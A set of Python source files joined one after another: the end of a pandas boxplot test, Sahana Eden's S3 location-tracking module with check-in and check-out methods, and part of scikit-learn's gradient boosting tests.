result_xticklabel = [x.get_text() for x in axes.get_xticklabels()]
assert expected_xticklabel == result_xticklabel
def test_boxplot_multiindex_column(self):
# GH 16748
arrays = [
["bar", "bar", "baz", "baz", "foo", "foo", "qux", "qux"],
["one", "two", "one", "two", "one", "two", "one", "two"],
]
tuples = list(zip(*arrays))
index = MultiIndex.from_tuples(tuples, names=["first", "second"])
df = DataFrame(np.random.randn(3, 8), index=["A", "B", "C"], columns=index)
col = [("bar", "one"), ("bar", "two")]
axes = _check_plot_works(df.boxplot, column=col, return_type="axes")
expected_xticklabel = ["(bar, one)", "(bar, two)"]
result_xticklabel = [x.get_text() for x in axes.get_xticklabels()]
assert expected_xticklabel == result_xticklabel
|
|
# -*- coding: utf-8 -*-
""" Simple Generic Location Tracking System
@copyright: 2011-14 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from datetime import datetime, timedelta
from gluon import current
from gluon.storage import Storage
try:
from gluon.dal.objects import Table, Rows, Row
except ImportError:
# old web2py
from gluon.dal import Table, Rows, Row
from gluon.html import *
from s3rest import S3Method
__all__ = ("S3Tracker",
"S3CheckInMethod",
"S3CheckOutMethod",
)
UID = "uuid" # field name for UIDs
TRACK_ID = "track_id" # field name for track ID
LOCATION_ID = "location_id" # field name for base location
LOCATION = "gis_location" # location tablename
PRESENCE = "sit_presence" # presence tablename
# =============================================================================
class S3Trackable(object):
"""
Trackable types instance(s)
"""
def __init__(self, table=None, tablename=None, record=None, query=None,
record_id=None, record_ids=None, rtable=None):
"""
Constructor:
@param table: a Table object
@param tablename: a Str tablename
@param record: a Row object
@param query: a Query object
@param record_id: a record ID (if object is a Table)
@param record_ids: a list of record IDs (if object is a Table)
- these should be in ascending order
@param rtable: the resource table (for the recursive calls)
"""
db = current.db
s3db = current.s3db
self.records = []
self.table = s3db.sit_trackable
self.rtable = rtable
# if isinstance(trackable, (Table, str)):
# if hasattr(trackable, "_tablename"):
# table = trackable
# tablename = table._tablename
# else:
# table = s3db[trackable]
# tablename = trackable
# fields = self.__get_fields(table)
# if not fields:
# raise SyntaxError("Not a trackable type: %s" % tablename)
# query = (table._id > 0)
# if uid is None:
# if record_id is not None:
# if isinstance(record_id, (list, tuple)):
# query = (table._id.belongs(record_id))
# else:
# query = (table._id == record_id)
# elif UID in table.fields:
# if not isinstance(uid, (list, tuple)):
# query = (table[UID].belongs(uid))
# else:
# query = (table[UID] == uid)
# fields = [table[f] for f in fields]
# rows = db(query).select(*fields)
if table or tablename:
if table:
tablename = table._tablename
else:
table = s3db[tablename]
fields = self.__get_fields(table)
if not fields:
raise SyntaxError("Not a trackable type: %s" % tablename)
if record_ids:
query = (table._id.belongs(record_ids))
limitby = (0, len(record_ids))
orderby = table._id
elif record_id:
query = (table._id == record_id)
limitby = (0, 1)
orderby = None
else:
query = (table._id > 0)
limitby = None
orderby = table._id
fields = [table[f] for f in fields]
rows = db(query).select(limitby=limitby, orderby=orderby, *fields)
# elif isinstance(trackable, Row):
# fields = self.__get_fields(trackable)
# if not fields:
# raise SyntaxError("Required fields not present in the row")
# rows = Rows(records=[trackable], compact=False)
elif record:
fields = self.__get_fields(record)
if not fields:
raise SyntaxError("Required fields not present in the row")
rows = Rows(records=[record], compact=False)
# elif isinstance(trackable, Rows):
# rows = [r for r in trackable if self.__get_fields(r)]
# fail = len(trackable) - len(rows)
# if fail:
# raise SyntaxError("Required fields not present in %d of the rows" % fail)
# rows = Rows(records=rows, compact=False)
# elif isinstance(trackable, (Query, Expression)):
# tablename = db._adapter.get_table(trackable)
# self.rtable = s3db[tablename]
# fields = self.__get_fields(self.rtable)
# if not fields:
# raise SyntaxError("Not a trackable type: %s" % tablename)
# query = trackable
# fields = [self.rtable[f] for f in fields]
# rows = db(query).select(*fields)
elif query:
tablename = db._adapter.get_table(query)
self.rtable = s3db[tablename]
fields = self.__get_fields(self.rtable)
if not fields:
raise SyntaxError("Not a trackable type: %s" % tablename)
fields = [self.rtable[f] for f in fields]
rows = db(query).select(*fields)
# elif isinstance(trackable, Set):
# query = trackable.query
# tablename = db._adapter.get_table(query)
# table = s3db[tablename]
# fields = self.__get_fields(table)
# if not fields:
# raise SyntaxError("Not a trackable type: %s" % tablename)
# fields = [table[f] for f in fields]
# rows = trackable.select(*fields)
else:
raise SyntaxError("Invalid parameters")
records = []
for r in rows:
if self.__super_entity(r):
table = s3db[r.instance_type]
fields = self.__get_fields(table, super_entity=False)
if not fields:
raise SyntaxError("No trackable type: %s" % table._tablename)
fields = [table[f] for f in fields]
query = table[UID] == r[UID]
row = db(query).select(limitby=(0, 1), *fields).first()
if row:
records.append(row)
else:
records.append(r)
self.records = Rows(records=records, compact=False)
# -------------------------------------------------------------------------
@staticmethod
def __super_entity(trackable):
"""
Check whether a trackable is a super-entity
@param trackable: the trackable object
"""
if hasattr(trackable, "fields"):
keys = trackable.fields
else:
keys = trackable
return "instance_type" in keys
# -------------------------------------------------------------------------
def __get_fields(self, trackable, super_entity=True):
"""
Check a trackable for presence of required fields
@param: the trackable object
"""
fields = []
if hasattr(trackable, "fields"):
keys = trackable.fields
else:
keys = trackable
try:
if super_entity and \
self.__super_entity(trackable) and UID in keys:
return ("instance_type", UID)
if LOCATION_ID in keys:
fields.append(LOCATION_ID)
if TRACK_ID in keys:
fields.append(TRACK_ID)
return fields
elif hasattr(trackable, "update_record") or \
isinstance(trackable, Table) or \
isinstance(trackable, Row):
return fields
except:
pass
return None
# -------------------------------------------------------------------------
def get_location(self,
timestmp=None,
_fields=None,
_filter=None,
as_rows=False,
exclude=[]):
"""
Get the current location of the instance(s) (at the given time)
@param timestmp: last datetime for presence (defaults to current time)
@param _fields: fields to retrieve from the location records (None for ALL)
@param _filter: filter for the locations
@param as_rows: return the result as Rows object
@param exclude: interlocks to break at (avoids circular check-ins)
@return: a location record, or a list of location records (if multiple)
@ToDo: Also show Timestamp of when seen there
"""
db = current.db
s3db = current.s3db
ptable = s3db[PRESENCE]
ltable = s3db[LOCATION]
if timestmp is None:
timestmp = datetime.utcnow()
locations = []
for r in self.records:
location = None
if TRACK_ID in r:
query = ((ptable.deleted == False) & \
(ptable[TRACK_ID] == r[TRACK_ID]) & \
(ptable.timestmp <= timestmp))
presence = db(query).select(orderby=~ptable.timestmp,
limitby=(0, 1)).first()
if presence:
if presence.interlock:
exclude = [r[TRACK_ID]] + exclude
tablename, record_id = presence.interlock.split(",", 1)
trackable = S3Trackable(tablename=tablename, record_id=record_id)
record = trackable.records.first()
if TRACK_ID not in record or \
record[TRACK_ID] not in exclude:
location = trackable.get_location(timestmp=timestmp,
exclude=exclude,
_fields=_fields,
as_rows=True).first()
elif presence.location_id:
query = (ltable.id == presence.location_id)
if _filter is not None:
query = query & _filter
if _fields is None:
location = db(query).select(ltable.ALL,
limitby=(0, 1)).first()
else:
location = db(query).select(limitby=(0, 1),
*_fields).first()
if not location:
if len(self.records) > 1:
trackable = S3Trackable(record=r, rtable=self.rtable)
else:
trackable = self
location = trackable.get_base_location(_fields=_fields)
if location:
locations.append(location)
else:
# Ensure we return an entry so that indexes match
locations.append(Row({"lat": None, "lon": None}))
if as_rows:
return Rows(records=locations, compact=False)
if not locations:
return None
else:
return locations
# -------------------------------------------------------------------------
def set_location(self, location, timestmp=None):
"""
Set the current location of instance(s) (at the given time)
@param location: the location (as Row or record ID)
@param timestmp: the datetime of the presence (defaults to current time)
@return: nothing
"""
ptable = current.s3db[PRESENCE]
if timestmp is None:
timestmp = datetime.utcnow()
if isinstance(location, S3Trackable):
location = location.get_base_location()
if isinstance(location, Rows):
location = location.first()
if isinstance(location, Row):
if "location_id" in location:
location = location.location_id
else:
location = location.id
if not location:
return
else:
data = dict(location_id=location, timestmp=timestmp)
for r in self.records:
if TRACK_ID not in r:
# No track ID => set base location
if len(self.records) > 1:
trackable = S3Trackable(record=r)
else:
trackable = self
trackable.set_base_location(location)
elif r[TRACK_ID]:
data.update({TRACK_ID:r[TRACK_ID]})
ptable.insert(**data)
self.__update_timestamp(r[TRACK_ID], timestmp)
return location
# -------------------------------------------------------------------------
def check_in(self, table, record, timestmp=None):
"""
Bind the presence of the instance(s) to another instance
@param table: table name of the other resource
@param record: record in the other resource (as Row or record ID)
@param timestmp: datetime of the check-in
@return: nothing
"""
db = current.db
s3db = current.s3db
ptable = s3db[PRESENCE]
if isinstance(table, str):
table = s3db[table]
fields = self.__get_fields(table)
if not fields:
raise SyntaxError("No location data in %s" % table._tablename)
interlock = None
if isinstance(record, Rows):
record = record.first()
if not isinstance(record, Row):
record = table[record]
if self.__super_entity(record):
table = s3db[record.instance_type]
fields = self.__get_fields(table, super_entity=False)
if not fields:
raise SyntaxError("No trackable type: %s" % table._tablename)
query = table[UID] == record[UID]
record = db(query).select(limitby=(0, 1)).first()
if record and table._id.name in record:
record = record[table._id.name]
if record:
interlock = "%s,%s" % (table, record)
else:
raise SyntaxError("No record specified for %s" % table._tablename)
if interlock:
if timestmp is None:
timestmp = datetime.utcnow()
data = dict(location_id=None,
timestmp=timestmp,
interlock=interlock)
q = ((ptable.deleted == False) & (ptable.timestmp <= timestmp))
for r in self.records:
if TRACK_ID not in r:
# Cannot check-in a non-trackable
continue
query = q & (ptable[TRACK_ID] == r[TRACK_ID])
presence = db(query).select(orderby=~ptable.timestmp,
limitby=(0, 1)).first()
if presence and presence.interlock == interlock:
# already checked-in to the same instance
continue
data.update({TRACK_ID:r[TRACK_ID]})
ptable.insert(**data)
self.__update_timestamp(r[TRACK_ID], timestmp)
# -------------------------------------------------------------------------
def check_out(self, table=None, record=None, timestmp=None):
"""
Make the last log entry before timestmp independent from
the referenced entity (if any)
@param timestmp: the date/time of the check-out, defaults
to current time
"""
db = current.db
s3db = current.s3db
ptable = s3db[PRESENCE]
if timestmp is None:
timestmp = datetime.utcnow()
interlock = None
if table is not None:
if isinstance(table, str):
table = s3db[table]
if isinstance(record, Rows):
record = record.first()
if self.__super_entity(table):
if not isinstance(record, Row):
record = table[record]
table = s3db[record.instance_type]
fields = self.__get_fields(table, super_entity=False)
if not fields:
raise SyntaxError("No trackable type: %s" % table._tablename)
query = table[UID] == record[UID]
record = db(query).select(limitby=(0, 1)).first()
if isinstance(record, Row) and table._id.name in record:
record = record[table._id.name]
if record:
interlock = "%s,%s" % (table, record)
else:
return
q = ((ptable.deleted == False) & (ptable.timestmp <= timestmp))
for r in self.records:
if TRACK_ID not in r:
# Cannot check-out a non-trackable
continue
query = q & (ptable[TRACK_ID] == r[TRACK_ID])
presence = db(query).select(orderby=~ptable.timestmp,
limitby=(0, 1)).first()
if presence and presence.interlock:
if interlock and presence.interlock != interlock:
continue
elif not interlock and table and \
not presence.interlock.startswith("%s" % table):
continue
tablename, record_id = presence.interlock.split(",", 1)
trackable = S3Trackable(tablename=tablename, record_id=record_id)
location = trackable.get_location(_fields=["id"],
timestmp=timestmp,
as_rows=True).first()
if timestmp - presence.timestmp < timedelta(seconds=1):
timestmp = timestmp + timedelta(seconds=1)
data = dict(location_id=location.id,
timestmp=timestmp,
interlock=None)
data.update({TRACK_ID:r[TRACK_ID]})
ptable.insert(**data)
self.__update_timestamp(r[TRACK_ID], timestmp)
# -------------------------------------------------------------------------
def remove_location(self, location=None):
"""
Remove a location from the presence log of the instance(s)
@todo: implement
"""
raise NotImplementedError
# -------------------------------------------------------------------------
def get_base_location(self,
_fields=None,
_filter=None,
as_rows=False):
"""
Get the base location of the instance(s)
@param _fields: fields to retrieve from the location records (None for ALL)
@param _filter: filter for the locations
@param as_rows: return the result as Rows object
@return: the base location(s) of the current instance
"""
db = current.db
s3db = current.s3db
ltable = s3db[LOCATION]
rtable = self.rtable
locations = []
for r in self.records:
location = None
query = None
if LOCATION_ID in r:
query = (ltable.id == r[LOCATION_ID])
if rtable:
query = query & (rtable[LOCATION_ID] == ltable.id)
if TRACK_ID in r:
query = query & (rtable[TRACK_ID] == r[TRACK_ID])
elif TRACK_ID in r:
q = (self.table[TRACK_ID] == r[TRACK_ID])
trackable = db(q).select(limitby=(0, 1)).first()
table = s3db[trackable.instance_type]
if LOCATION_ID in table.fields:
query = ((table[TRACK_ID] == r[TRACK_ID]) &
(table[LOCATION_ID] == ltable.id))
if query:
if _filter is not None:
query = query & _filter
if not _fields:
location = db(query).select(ltable.ALL,
limitby=(0, 1)).first()
else:
location = db(query).select(limitby=(0, 1),
*_fields).first()
if location:
locations.append(location)
else:
# Ensure we return an entry so that indexes match
locations.append(Row({"lat": None, "lon": None}))
if as_rows:
return Rows(records=locations, compact=False)
if not locations:
return None
elif len(locations) == 1:
return locations[0]
else:
return locations
# -------------------------------------------------------------------------
def set_base_location(self, location=None):
"""
Set the base location of the instance(s)
@param location: the location for the base location as Row or record ID
@return: nothing
@note: instance tables without a location_id field will be ignored
"""
if isinstance(location, S3Trackable):
location = location.get_base_location()
if isinstance(location, Rows):
location = location.first()
if isinstance(location, Row):
location.get("id", None)
if not location or not str(location).isdigit():
# Location not found
return
else:
data = {LOCATION_ID:location}
# Update records without track ID
for r in self.records:
if TRACK_ID in r:
continue
elif LOCATION_ID in r:
if hasattr(r, "update_record"):
r.update_record(**data)
else:
raise SyntaxError("Cannot relate record to a table.")
db = current.db
s3db = current.s3db
# Update records with track ID
# => this can happen table-wise = less queries
track_ids = [r[TRACK_ID] for r in self.records if TRACK_ID in r]
rows = db(self.table[TRACK_ID].belongs(track_ids)).select()
tables = []
append = tables.append
types = set()
seen = types.add
for r in rows:
instance_type = r.instance_type
if instance_type not in types:
seen(instance_type)
table = s3db[instance_type]
if instance_type not in tables and LOCATION_ID in table.fields:
append(table)
else:
# No location ID in this type => ignore gracefully
continue
# Location specified => update all base locations
for table in tables:
db(table[TRACK_ID].belongs(track_ids)).update(**data)
# Refresh records
for r in self.records:
if LOCATION_ID in r:
r[LOCATION_ID] = location
return location
# -------------------------------------------------------------------------
def __update_timestamp(self, track_id, timestamp):
"""
Update the timestamp of a trackable
@param track_id: the trackable ID (super-entity key)
@param timestamp: the timestamp
"""
if timestamp is None:
timestamp = datetime.utcnow()
if track_id:
trackable = self.table[track_id]
if trackable:
trackable.update_record(track_timestmp=timestamp)
# =============================================================================
class S3Tracker(object):
"""
S3 Tracking system, can be instantiated once as global 's3tracker' object
"""
def __init__(self):
"""
Constructor
"""
# -------------------------------------------------------------------------
def __call__(self, table=None, record_id=None, record_ids=None,
tablename=None, record=None, query=None):
"""
Get a tracking interface for a record or set of records
@param table: a Table object
@param record_id: a record ID (together with Table or tablename)
@param record_ids: a list/tuple of record IDs (together with Table or tablename)
@param tablename: a Str object
@param record: a Row object
@param query: a Query object
@return: a S3Trackable instance for the specified record(s)
"""
return S3Trackable(table=table,
tablename=tablename,
record_id=record_id,
record_ids=record_ids,
record=record,
query=query,
)
# -------------------------------------------------------------------------
def get_all(self, entity,
location=None,
bbox=None,
timestmp=None):
"""
Get all instances of the given entity at the given location and time
"""
raise NotImplementedError
# -------------------------------------------------------------------------
def get_checked_in(self, table, record,
instance_type=None,
timestmp=None):
"""
Get all trackables of the given type that are checked-in
to the given instance at the given time
"""
raise NotImplementedError
# =============================================================================
class S3CheckInMethod(S3Method):
"""
Custom Method to allow a trackable resource to check-in
"""
# -------------------------------------------------------------------------
@staticmethod
def apply_method(r, **attr):
"""
Apply method.
@param r: the S3Request
@param attr: controller options for this request
"""
if r.representation == "html":
T = current.T
s3db = current.s3db
response = current.response
table = r.table
tracker = S3Trackable(table, record_id=r.id)
title = T("Check-In")
get_vars = r.get_vars
# Are we being passed a location_id?
location_id = get_vars.get("location_id", None)
if not location_id:
# Are we being passed a lat and lon?
lat = get_vars.get("lat", None)
if lat is not None:
lon = get_vars.get("lon", None)
if lon is not None:
form_vars = Storage(lat = float(lat),
lon = float(lon),
)
form = Storage(vars=form_vars)
s3db.gis_location_onvalidation(form)
location_id = s3db.gis_location.insert(**form_vars)
form = None
if not location_id:
# Give the user a form to check-in
# Test the formstyle
formstyle = current.deployment_settings.get_ui_formstyle()
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "location_id"
label = LABEL("%s:" % T("Location"))
from s3.s3widgets import S3LocationSelector
field = table.location_id
#value = tracker.get_location(_fields=["id"],
# as_rows=True).first().id
value = None # We always want to create a new Location, not update the existing one
widget = S3LocationSelector()(field, value)
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Check-In"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(current.request.vars, current.session):
location_id = form.vars.get("location_id", None)
if location_id:
# We're not Checking-in in S3Track terms (that's about interlocking with another object)
#tracker.check_in()
#timestmp = form.vars.get("timestmp", None)
#if timestmp:
# # @ToDo: Convert from string
# pass
#tracker.set_location(location_id, timestmp=timestmp)
tracker.set_location(location_id)
response.confirmation = T("Checked-In successfully!")
response.view = "check-in.html"
output = dict(form = form,
title = title,
)
return output
# @ToDo: JSON representation for check-in from mobile devices
else:
raise HTTP(501, current.ERROR.BAD_METHOD)
# =============================================================================
class S3CheckOutMethod(S3Method):
"""
Custom Method to allow a trackable resource to check-out
"""
# -------------------------------------------------------------------------
@staticmethod
def apply_method(r, **attr):
"""
Apply method.
@param r: the S3Request
@param attr: controller options for this request
"""
if r.representation == "html":
T = current.T
s3db = current.s3db
response = current.response
tracker = S3Trackable(r.table, record_id=r.id)
title = T("Check-Out")
# Give the user a form to check-out
# Test the formstyle
formstyle = current.deployment_settings.get_ui_formstyle()
row = formstyle("test", "test", "test", "test")
if isinstance(row, tuple):
# Formstyle with separate row for label (e.g. default Eden formstyle)
tuple_rows = True
else:
# Formstyle with just a single row (e.g. Bootstrap, Foundation or DRRPP)
tuple_rows = False
form_rows = []
comment = ""
_id = "submit"
label = ""
widget = INPUT(_type="submit", _value=T("Check-Out"))
row = formstyle("%s__row" % _id, label, widget, comment)
if tuple_rows:
form_rows.append(row[0])
form_rows.append(row[1])
else:
form_rows.append(row)
if tuple_rows:
# Assume TRs
form = FORM(TABLE(*form_rows))
else:
form = FORM(*form_rows)
if form.accepts(current.request.vars, current.session):
# Check-Out
# We're not Checking-out in S3Track terms (that's about removing an interlock with another object)
# What we're doing is saying that we're now back at our base location
#tracker.check_out()
#timestmp = form_vars.get("timestmp", None)
#if timestmp:
# # @ToDo: Convert from string
# pass
#tracker.set_location(r.record.location_id, timestmp=timestmp)
tracker.set_location(r.record.location_id)
response.confirmation = T("Checked-Out successfully!")
response.view = "check-in.html"
output = dict(form = form,
title = title,
)
return output
# @ToDo: JSON representation for check-out from mobile devices
else:
raise HTTP(501, current.ERROR.BAD_METHOD)
# END =========================================================================
|
|
"""
Testing for the gradient boosting module (sklearn.ensemble.gradient_boosting).
"""
import warnings
import numpy as np
from sklearn import datasets
from sklearn.base import clone
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble.gradient_boosting import ZeroEstimator
from sklearn.metrics import mean_squared_error
from sklearn.utils import check_random_state, tosequence
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_warns
from sklearn.utils.validation import DataConversionWarning
from sklearn.utils.validation import NotFittedError
# toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
true_result = [-1, 1, 1]
rng = np.random.RandomState(0)
# also load the boston dataset
# and randomly permute it
boston = datasets.load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
# also load the iris dataset
# and randomly permute it
iris = datasets.load_iris()
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
def test_classification_toy():
# Check classification on a toy dataset.
for loss in ('deviance', 'exponential'):
clf = GradientBoostingClassifier(loss=loss, n_estimators=10,
random_state=1)
assert_raises(ValueError, clf.predict, T)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(10, len(clf.estimators_))
deviance_decrease = (clf.train_score_[:-1] - clf.train_score_[1:])
assert np.any(deviance_decrease >= 0.0), \
"Train deviance does not monotonically decrease."
def test_parameter_checks():
# Check input parameter validation.
assert_raises(ValueError,
GradientBoostingClassifier(n_estimators=0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(n_estimators=-1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(learning_rate=0.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(learning_rate=-1.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='foobar').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_split=0.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_split=-1.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_leaf=0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_leaf=-1.).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_weight_fraction_leaf=-1.).fit,
X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_weight_fraction_leaf=0.6).fit,
X, y)
assert_raises(ValueError,
GradientBoostingClassifier(subsample=0.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(subsample=1.1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(subsample=-0.1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(max_depth=-0.1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(max_depth=0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(init={}).fit, X, y)
# test fit before feature importance
assert_raises(ValueError,
lambda: GradientBoostingClassifier().feature_importances_)
# deviance requires ``n_classes >= 2``.
assert_raises(ValueError,
lambda X, y: GradientBoostingClassifier(
loss='deviance').fit(X, y),
X, [0, 0, 0, 0])
def test_loss_function():
assert_raises(ValueError,
GradientBoostingClassifier(loss='ls').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='lad').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='quantile').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='huber').fit, X, y)
assert_raises(ValueError,
GradientBoostingRegressor(loss='deviance').fit, X, y)
assert_raises(ValueError,
GradientBoostingRegressor(loss='exponential').fit, X, y)
def test_classification_synthetic():
# Test GradientBoostingClassifier on synthetic dataset used by
# Hastie et al. in ESLII Example 12.7.
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
for loss in ('deviance', 'exponential'):
gbrt = GradientBoostingClassifier(n_estimators=100, min_samples_split=1,
max_depth=1, loss=loss,
learning_rate=1.0, random_state=0)
gbrt.fit(X_train, y_train)
error_rate = (1.0 - gbrt.score(X_test, y_test))
assert error_rate < 0.09, \
"GB(loss={}) failed with error {}".format(loss, error_rate)
gbrt = GradientBoostingClassifier(n_estimators=200, min_samples_split=1,
max_depth=1,
learning_rate=1.0, subsample=0.5,
random_state=0)
gbrt.fit(X_train, y_train)
error_rate = (1.0 - gbrt.score(X_test, y_test))
assert error_rate < 0.08, ("Stochastic GradientBoostingClassifier(loss={}) "
"failed with error {}".format(loss, error_rate))
def test_boston():
# Check consistency on dataset boston house prices with least squares
# and least absolute deviation.
for loss in ("ls", "lad", "huber"):
for subsample in (1.0, 0.5):
last_y_pred = None
for i, sample_weight in enumerate(
(None, np.ones(len(boston.target)),
2 * np.ones(len(boston.target)))):
clf = GradientBoostingRegressor(n_estimators=100, loss=loss,
max_depth=4, subsample=subsample,
min_samples_split=1,
random_state=1)
assert_raises(ValueError, clf.predict, boston.data)
clf.fit(boston.data, boston.target,
sample_weight=sample_weight)
y_pred = clf.predict(boston.data)
mse = mean_squared_error(boston.target, y_pred)
assert mse < 6.0, "Failed with loss %s and " \
"mse = %.4f" % (loss, mse)
if last_y_pred is not None:
np.testing.assert_array_almost_equal(
last_y_pred, y_pred,
err_msg='pred_%d doesnt match last pred_%d for loss %r and subsample %r. '
% (i, i - 1, loss, subsample))
last_y_pred = y_pred
def test_iris():
# Check consistency on dataset iris.
for subsample in (1.0, 0.5):
for sample_weight in (None, np.ones(len(iris.target))):
clf = GradientBoostingClassifier(n_estimators=100, loss='deviance',
random_state=1, subsample=subsample)
clf.fit(iris.data, iris.target, sample_weight=sample_weight)
score = clf.score(iris.data, iris.target)
assert score > 0.9, "Failed with subsample %.1f " \
"and score = %f" % (subsample, score)
def test_regression_synthetic():
# Test on synthetic regression datasets used in Leo Breiman,
# `Bagging Predictors?. Machine Learning 24(2): 123-140 (1996).
random_state = check_random_state(1)
regression_params = {'n_estimators': 100, 'max_depth': 4,
'min_samples_split': 1, 'learning_rate': 0.1,
'loss': 'ls'}
# Friedman1
X, y = datasets.make_friedman1(n_samples=1200,
random_state=random_state, noise=1.0)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingRegressor()
clf.fit(X_train, y_train)
mse = mean_squared_error(y_test, clf.predict(X_test))
assert mse < 5.0, "Failed on Friedman1 with mse = %.4f" % mse
# Friedman2
X, y = datasets.make_friedman2(n_samples=1200, random_state=random_state)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingRegressor(**regression_params)
clf.fit(X_train, y_train)
mse = mean_squared_error(y_test, clf.predict(X_test))
assert mse < 1700.0, "Failed on Friedman2 with mse = %.4f" % mse
# Friedman3
X, y = datasets.make_friedman3(n_samples=1200, random_state=random_state)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingRegressor(**regression_params)
clf.fit(X_train, y_train)
mse = mean_squared_error(y_test, clf.predict(X_test))
assert mse < 0.015, "Failed on Friedman3 with mse = %.4f" % mse
def test_feature_importances():
X = np.array(boston.data, dtype=np.float32)
y = np.array(boston.target, dtype=np.float32)
clf = GradientBoostingRegressor(n_estimators=100, max_depth=5,
min_samples_split=1, random_state=1)
clf.fit(X, y)
#feature_importances = clf.feature_importances_
assert_true(hasattr(clf, 'feature_importances_'))
X_new = clf.transform(X, threshold="mean")
assert_less(X_new.shape[1], X.shape[1])
feature_mask = clf.feature_importances_ > clf.feature_importances_.mean()
assert_array_almost_equal(X_new, X[:, feature_mask])
# true feature importance ranking
# true_ranking = np.array([3, 1, 8, 2, 10, 9, 4, 11, 0, 6, 7, 5, 12])
# assert_array_equal(true_ranking, feature_importances.argsort())
def test_probability_log():
# Predict probabilities.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(ValueError, clf.predict_proba, T)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
# check if probabilities are in [0, 1].
y_proba = clf.predict_proba(T)
assert np.all(y_proba >= 0.0)
assert np.all(y_proba <= 1.0)
# derive predictions from probabilities
y_pred = clf.classes_.take(y_proba.argmax(axis=1), axis=0)
assert_array_equal(y_pred, true_result)
def test_check_inputs():
# Test input checks (shape and type of X and y).
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(ValueError, clf.fit, X, y + [0, 1])
from scipy import sparse
X_sparse = sparse.csr_matrix(X)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(TypeError, clf.fit, X_sparse, y)
clf = GradientBoostingClassifier().fit(X, y)
assert_raises(TypeError, clf.predict, X_sparse)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(ValueError, clf.fit, X, y,
sample_weight=([1] * len(y)) + [0, 1])
def test_check_inputs_predict():
# X has wrong shape
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y)
x = np.array([1.0, 2.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
x = np.array([])
assert_raises(ValueError, clf.predict, x)
x = np.array([1.0, 2.0, 3.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
clf = GradientBoostingRegressor(n_estimators=100, random_state=1)
clf.fit(X, rng.rand(len(X)))
x = np.array([1.0, 2.0])[:, np.newaxis]
